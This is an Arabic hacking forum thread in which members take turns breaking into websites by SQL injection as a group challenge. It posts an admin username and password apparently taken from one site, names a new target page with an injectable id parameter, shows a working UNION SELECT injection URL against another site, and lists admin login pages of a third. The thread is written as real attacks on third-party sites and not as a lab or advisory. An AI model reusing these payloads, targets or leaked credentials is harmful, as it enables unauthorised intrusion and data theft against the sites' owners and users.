الثغرة تم ترقيعها يا غالي
+
كلامك على عيني وعلى راسي
بس انا فعلا حقنت الموقع قبل ما وضعتو على قائمة الاهداف الجديدة
وهاي معلومات الادمن
UserName : alseadi
Password : wfahad12
شكرا على المشاركة معانا وننتظر حقن الهدف الجديد..
تحياتي
تم تغير الهدف...
هذا الهدف الجديد : http://www.araob.com/news.php?id=1204
ملاحضة : الي يحقن الموقع لا يغير الاندكس ولا الباس ولا يغير اي شي بالموقع لانه موقع عربي..
نحن راح نحقن القاعدة وبعدها راح نراسل الادارة بخصوص الثغرة والترقيع
تحياتي
بالنسبة للاسماء الخاصة بعمود الباس واليوزر اي فعلا هي مش متواجدة بالاسم الاعتيادي...
بس الموقع لمن جربت افتح احد العواميد فتحت عادي وهذا المثال :
http://www.estaciontierra.com/artistas/artista.php?id=-201+union+select+1,artista,3,4,5,6,7,8,9,10,11,12,13,14+from+artistas--
لي عودة مرة...
المعلومات الخاصة بالدخول صحيحة 100%
لكن هذا الموقع غريب شوي
يعني الموقع فيه تقريبا 100 لوحة دخول وكلهم تقريبا لمن تفتحهم يطلع عامللهم تصريح للدخول...
لكن انا لقيت هاي الصفحات :
http://www.conflictanddevelopment.org/checkuser.php
http://www.conflictanddevelopment.org/myadmin/...